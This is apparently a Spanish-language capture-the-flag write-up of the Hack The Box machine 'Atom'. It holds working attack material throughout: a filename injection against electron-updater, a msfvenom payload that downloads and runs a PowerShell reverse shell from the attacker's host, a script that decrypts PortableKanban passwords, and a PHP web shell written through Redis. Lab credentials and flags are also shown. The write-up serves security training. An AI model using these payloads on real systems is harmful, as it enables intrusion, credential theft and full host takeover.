This page looks best with JavaScript enabled

Hack The Box - Atom

 •  ✍️ sckull
featured image

Atom presenta una aplicacion Electron. Explotamos una vulnerabilidad en un modulo de actualizacion que permitio ejecutar comandos a través de un archivo de actualizacion y acceso al servidor de actualizaciones. Obtuvimos credenciales a través de Portable Kanban lo que nos dio acceso a Redis donde encontramos la contraseña del administrador. Tambien, por medio de Redis escribimos una web shell que nos dio acceso privilegiado.

Nombre Atom box_img_maker
OS

Windows

Puntos 30
Dificultad Media
IP 10.10.10.237
Maker

MrR3boot
Matrix 
{
   "type":"radar",
   "data":{
      "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
      "datasets":[
         {
            "label":"User Rate",  "data":[6.1, 4.7, 4.8, 5.2, 5.3],
            "backgroundColor":"rgba(75, 162, 189,0.5)",
            "borderColor":"#4ba2bd"
         },
         { 
            "label":"Maker Rate",
            "data":[6, 10, 5, 5, 0],
            "backgroundColor":"rgba(154, 204, 20,0.5)",
            "borderColor":"#9acc14"
         }
      ]
   },
    "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
            "angleLines":{"color":"rgba(255, 255, 255,0.6)"},
            "gridLines":{"color":"rgba(255, 255, 255,0.6)"}
        }
    }
}

NMAP

Escaneo de puertos con nmap nos muestra el puerto http (80), RPC (135), https (443) abiertos, samba (445) y el puerto redis (6379).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

# Nmap 7.91 scan initiated Wed May  5 19:48:52 2021 as: nmap -p- --min-rate 10000 -oN allports -Pn 10.10.10.237
Nmap scan report for 10.10.10.237 (10.10.10.237)
Host is up (0.14s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
443/tcp  open  https
445/tcp  open  microsoft-ds
6379/tcp open  redis

# Nmap done at Wed May  5 19:49:30 2021 -- 1 IP address (1 host up) scanned in 38.47 seconds
# Nmap 7.91 scan initiated Wed May  5 19:50:09 2021 as: nmap -Pn -p80,135,443,445,6379 -sV -sC -oN serviceports 10.10.10.237
Nmap scan report for 10.10.10.237 (10.10.10.237)
Host is up (0.069s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
135/tcp  open  msrpc        Microsoft Windows RPC
443/tcp  open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
6379/tcp open  redis        Redis key-value store
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h30m27s, deviation: 4h02m30s, median: 10m26s
| smb-os-discovery:
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-05T17:00:56-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-05-06T00:00:57
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May  5 19:51:07 2021 -- 1 IP address (1 host up) scanned in 57.87 seconds

RPC

Utilizamos rpcclient con una sesion nulla pero no tenemos permisos de acceso.

1
2

λ  ~  rpcclient -U '' -N 10.10.10.237
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

ENUM HTTP

Encontramos una pagina web en el puerto 80 donde se presenta el software Heed en su version 1.0.0
image

GOBUSTER

Gobuster mostró el mismo resultado para el puerto http (80) y https (443).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

λ  ~/htb/atom  gobuster dir -u http://atom.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 50 -x php,html,txt,xml
/index.html           (Status: 200) [Size: 7581]
/images               (Status: 301) [Size: 330] [--> http://atom.htb/images/]
/Images               (Status: 301) [Size: 330] [--> http://atom.htb/Images/]
/releases             (Status: 301) [Size: 332] [--> http://atom.htb/releases/]
/Index.html           (Status: 200) [Size: 7581]
/examples             (Status: 503) [Size: 398]
/licenses             (Status: 403) [Size: 417]
/IMAGES               (Status: 301) [Size: 330] [--> http://atom.htb/IMAGES/]
/%20                  (Status: 403) [Size: 298]
/INDEX.html           (Status: 200) [Size: 7581]
/Releases             (Status: 301) [Size: 332] [--> http://atom.htb/Releases/]
/server-status        (Status: 403) [Size: 417]

λ  ~/htb/atom  gobuster dir -u https://atom.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -q -t 50 -x php,html,txt,xml -k
/images               (Status: 301) [Size: 332] [--> https://atom.htb/images/]
/index.html           (Status: 200) [Size: 7581]
/Images               (Status: 301) [Size: 332] [--> https://atom.htb/Images/]
/releases             (Status: 301) [Size: 334] [--> https://atom.htb/releases/]
/Index.html           (Status: 200) [Size: 7581]
/examples             (Status: 503) [Size: 399]
/licenses             (Status: 403) [Size: 418]
/IMAGES               (Status: 301) [Size: 332] [--> https://atom.htb/IMAGES/]
/%20                  (Status: 403) [Size: 299]
/INDEX.html           (Status: 200) [Size: 7581]
/Releases             (Status: 301) [Size: 334] [--> https://atom.htb/Releases/]
/server-status        (Status: 403) [Size: 418]

HEED

Encontramos un archivo zip el cual contiene el software presentado en la pagina, al extraerlo vemos un ejecutable.

1
2

λ  ~/htb/atom/tmp  ls
 heed_setup_v1.0.0.zip  'heedv1 Setup 1.0.0.exe'

El ejecutable parece ser un instalador, con winrar logramos obtener los archivos los cuales pertenecen a una aplicacion escrita con en Electron.
image

Vemos un archivo yaml (app-update.yml) el cual contiene una direccion que aparentemente es para realizar la actualizacion de la aplicacion.

1
2
3
4

provider: generic
url: 'http://updates.atom.htb'
publisherName:
  - HackTheBox

La aplicacion solo crea y elimina notas, y al iniciar busca actualizaciones.
image

HEED CODE

Utilizando npx con al archivo app.asar logramos obtener el codigo fuente, no encontramos direcciones de base de datos, la aplicacion solo funciona de forma local y temporal en cuanto a la informacion.

1
2

# extract
npx asar extract app.asar app_extract

Vemos que utiliza un modulo para “actualizar” la aplicacion: electron-updater - ^2.23.3.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

{
  "name": "heedv2",
  "version": "2.0.0",
  "main": "main.js",
  "description": "Open Source Application provided by HackTheBox",
  "author": "MrR3boot",
  "dependencies": {
    "electron-log": "^1.3.0",
    "electron-updater": "^2.23.3",
    "url": "^0.11.0"
  }
}

ENUM SAMBA

CME

Utilizamos esta herramienta para obtener informacion del servicio de SAMBA con una sesion null, vemos los recursos compartidos, tenemos permisos en el recurso Software_Updates.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

λ  ~/htb/atom  cme smb --shares atom.htb -u 'null' -p 'null'
SMB         10.10.10.237    445    ATOM             [*] Windows 10 Pro 19042 x64 (name:ATOM) (domain:ATOM) (signing:False) (SMBv1:True)
SMB         10.10.10.237    445    ATOM             [+] ATOM\null:null
SMB         10.10.10.237    445    ATOM             [+] Enumerated shares
SMB         10.10.10.237    445    ATOM             Share           Permissions     Remark
SMB         10.10.10.237    445    ATOM             -----           -----------     ------
SMB         10.10.10.237    445    ATOM             ADMIN$                          Remote Admin
SMB         10.10.10.237    445    ATOM             C$                              Default share
SMB         10.10.10.237    445    ATOM             IPC$                            Remote IPC
SMB         10.10.10.237    445    ATOM             Software_Updates READ,WRITE
λ  ~/htb/atom

SMBCLIENT

Con smbclient logramos enumerar el recurso donde vemos un archivo pdf.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

λ  ~/htb/atom  smbclient \\\\atom.htb\\Software_updates -u '' -p ''
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu May  6 02:17:47 2021
  ..                                  D        0  Thu May  6 02:17:47 2021
  client1                             D        0  Thu May  6 02:17:47 2021
  client2                             D        0  Thu May  6 02:17:47 2021
  client3                             D        0  Thu May  6 02:17:47 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 07:18:08 2021

		4413951 blocks of size 4096. 1262822 blocks available
smb: \>

El archivo es la documentacion del equipo de QA … menciona que antes de liberar una nueva version se realizan pruebas por parte del equipo, y para ello se debe de colocar en las carpetas de “cliente”, las cuales encontramos en el recurso Software_Updates aunque no especifica si es un archivo ejecutable.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

Heedv1.0
Internal QA Documentation

What is Heed ?
Note taking application built with electron-builder which helps users in taking important
notes.

Features ?
Very limited at the moment. There’s no server interaction when creating notes. So
currently it just acts as a one-tier thick client application. We are planning to move it to a
full fledged two-tier architecture sometime in the future releases.

What about QA ?
We follow the below process before releasing our products.
1. Build and install the application to make sure it works as we expect it to be.
2. Make sure that the update server running is in a private hardened instance. To
initiate the QA process, just place the updates in one of the "client" folders, and 
the appropriate QA team will test it to ensure it finds an update and installs it
correctly.
3. Follow the checklist to see if all given features are working as expected by the
developer.

JASON - USER

RCE - ELECTRON-UPDATER

Realizamos una busqueda de vulnerabilidades en Electron Updater y encontramos un post en el que explica que con un archivo .yml es posible ejecutar un exe y comandos, modificando la direccion url y path. En cuanto al exe, es decir v’ulnerable-app-setup-1.2.3.exe con una comilla simple se ejecutaría, por otro lado para ejecutar comandos se utilizan comillas dobles v';calc;'ulnerable-app-setup-1.2.3.exe.

1
2
3
4
5
6
7
8
9

#latest.yml
version: 1.2.3
files:
  - url: v';calc;'ulnerable-app-setup-1.2.3.exe
  sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
  size: 44653912
path: v';calc;'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

Despues de realizar diferentes modificaciones al archivo latest.yml logramos ejecutar nuestra shell cambiando el nombre del archivo.

1
2
3
4
5
6
7
8

version: 6.1.0
files:
- url: http://10.10.14.18/pay'load.exe
  sha512: 0wdfkI8aLN9XrsK/JpYCtxTnvnPi3+ezGGIU72KpGCzEaANmsQh7/ohmRNDHFyxnr/OIqWLa6wqr72l1rMd3xg==
  size: 73802
path: pay'load.exe
sha512: 0wdfkI8aLN9XrsK/JpYCtxTnvnPi3+ezGGIU72KpGCzEaANmsQh7/ohmRNDHFyxnr/OIqWLa6wqr72l1rMd3xg==
releaseDate: '2021-05-05T11:17:02.627Z'

1
2
3
4
5
6
7
8

# Reverse shell
echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.18 -Port 1338" >> nishang.ps1
# EXE
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.10.14.18/nishang.ps1')\"" -f exe -o payload.exe
# SHA512
shasum -a 512 "pay'load.exe" | cut -d " " -f1 | xxd -r -p | base64 | tr -d "$\n"
mv payload.exe "pay'load.exe"
python3 -m http.server 80

Para ejecutar comandos se agregan al nombre del archivo.

1

# mv payload.exe "pay';nslookup test.local 10.10.14.18;'load.exe"

Obtuvimos nuestra shell con el usuario Jason y la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

λ  ~/htb/atom  nc -lvp 1338
listening on [any] 1338 ...
connect to [10.10.14.18] from atom.htb [10.10.10.237] 61151
Windows PowerShell running as user jason on ATOM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\WINDOWS\system32>whoami
atom\jason
PS C:\WINDOWS\system32> type C:\Users\jason\Desktop\user.txt
13b9e357b45b1e0b0ff69bb4a5ee573c
PS C:\WINDOWS\system32>

PRIVILEGE ESCALATION

PORTABLE KANBAN

Enumerando las carpetas del usuario Jason encontramos PortableKanban, en el archivo de configuracion PortableKanban.cfg encontramos una contraseña encriptada.

1
2
3

PS C:\Users\Jason\Downloads\portablekanban> cat C:\Users\Jason\Downloads\portablekanban\PortableKanban.cfg
{"RoamingSettings":{"DataSource":"RedisServer","DbServer":"localhost","DbPort":6379,"DbEncPassword":"Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb","DbServer2":"","DbPort2":6379,"DbEncPassword2":"","DbIndex":0,"DbSsl":false,[... REDACTED ... ]}
PS C:\Users\Jason\Downloads\portablekanban>

Además encontramos un exploit con el cual logramos obtener en texto plano la contraseña.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

# Exploit Title: PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval
import base64
from des import * #python3 -m pip install des

def decode(hash):
  hash = base64.b64decode(hash.encode('utf-8'))
  key = DesKey(b"7ly6UznJ")
  return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

print(decode("Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb")) # kidvscat_yes_kidvscat

REDIS

Utilizamos la contraseña con redis-cli ya que existe el puerto 6379 abierto, encontramos una contraseña encriptada en una de las KEYS del “usuario” Administrator, utilizamos nuevamente el exploit para obtener en texto plano.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

λ  ~/htb/atom/wwww  redis-cli -h 10.10.10.237 -a "kidvscat_yes_kidvscat"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379> ping
PONG
10.10.10.237:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
3) "pk:ids:User"
4) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
10.10.10.237:6379> get pk:ids:MetaDataClass
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
10.10.10.237:6379> get pk:ids:User
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.10.237:6379> get pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff
"{\"Id\":\"ffffffffffffffffffffffffffffffff\",\"SchemaVersion\":\"4.2.0.0\",\"SchemaVersionModified\":\"\\/Date(1617420120000-0700)\\/\",\"SchemaVersionModifiedBy\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"SchemaVersionChecked\":\"\\/Date(-62135596800000-0000)\\/\",\"SchemaVersionCheckedBy\":\"00000000000000000000000000000000\",\"TimeStamp\":637530169345346438}"
(0.54s)
10.10.10.237:6379>

Verificamos con crackmapexec, vemos que es la contraseña de Administrator y tenemos acceso completo.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

λ  ~/htb/atom/wwww  cme smb -u Administrator -p "kidvscat_admin_@123" --shares 10.10.10.237
SMB         10.10.10.237    445    ATOM             [*] Windows 10 Pro 19042 x64 (name:ATOM) (domain:ATOM) (signing:False) (SMBv1:True)
SMB         10.10.10.237    445    ATOM             [+] ATOM\Administrator:kidvscat_admin_@123 (Pwn3d!)
SMB         10.10.10.237    445    ATOM             [+] Enumerated shares
SMB         10.10.10.237    445    ATOM             Share           Permissions     Remark
SMB         10.10.10.237    445    ATOM             -----           -----------     ------
SMB         10.10.10.237    445    ATOM             ADMIN$          READ,WRITE      Remote Admin
SMB         10.10.10.237    445    ATOM             C$              READ,WRITE      Default share
SMB         10.10.10.237    445    ATOM             IPC$                            Remote IPC
SMB         10.10.10.237    445    ATOM             Software_Updates READ,WRITE
λ  ~/htb/atom/wwww

WINRM

Por alguna razon el puerto de winrm no apareció en nmap, utilizamos este ultimo puerto para obtener una shell y nuestra flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

λ  ~/htb/atom/wwww  evil-winrm -i 10.10.10.237 -u Administrator -p "kidvscat_admin_@123"

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
atom\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          5/6/2021   4:43 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
50448bb96c0c36cbc2b89e9bebff9588
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

REDIS TO ROOT

Tambien mediante Redis logramos ejecutar comandos, modificando la configuracion de redis para escribir una web shell, similar a Postman - HTB.

1
2
3
4
5
6
7
8
9

λ  ~/htb/atom  redis-cli -h 10.10.10.237 -a "kidvscat_yes_kidvscat"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379> config set dbfilename redis.php
OK
10.10.10.237:6379> set test "<?php echo(system($_GET['cmd'])); ?>"
OK
10.10.10.237:6379> save
OK
10.10.10.237:6379>

Tambien encontramos las KEYS en nuestra webshell.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

λ  ~/htb/atom/wwww  curl -sX GET "http://atom.htb/redis.php?cmd=whoami%20/all" -o out.txt; cat out.txt
REDIS0006
         pk:ids:User$e8e29158-d70d-44b1-a1ba-4949d52790a0�9pk:urn:metadataclass:f-@�ff��J{"Id":"f�","SchemaVersion 24.2.0.0�Modifie@T\/Date(1617420120 -0700)\/�6By Ze8e29158d70d44b1a1ba4949d52790a�sCheck�r    -621355968 r@t �
                                        t7`s !� TimeStamp":637530169345346438}test$
USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\system S-1-5-18


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Disabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

52790a0","Name )29158-d70d-44b1-a1ba-4949d52790a0���{"Id":"e8e29158d70d44b1a1ba4949d
Email           Administrator Initials
ncryptedPasswor@fOdh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi ARol�f Inactiv f de,"TimeStamp":637530169606440253}pk:ids:MetaDataClass�$ff-@�ffs-key$
[ ... REDACTED ... ]

λ  ~/htb/atom/wwww

REDIS PROCESS

Con la shell que obtuvimos con WINRM encontramos que redis-server esta siendo ejecutado por el administrador y es por eso que logramos ejecutar comandos privilegiados en REDIS TO ROOT.

1
2
3
4
5

*Evil-WinRM* PS C:\xampp\htdocs> Get-Process -Name redis-server -IncludeUserName

Handles      WS(K)   CPU(s)     Id UserName               ProcessName
-------      -----   ------     -- --------               -----------
    126      20628     0.61   7712 NT AUTHORITY\NETWOR... redis-server
Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

HTB: Atom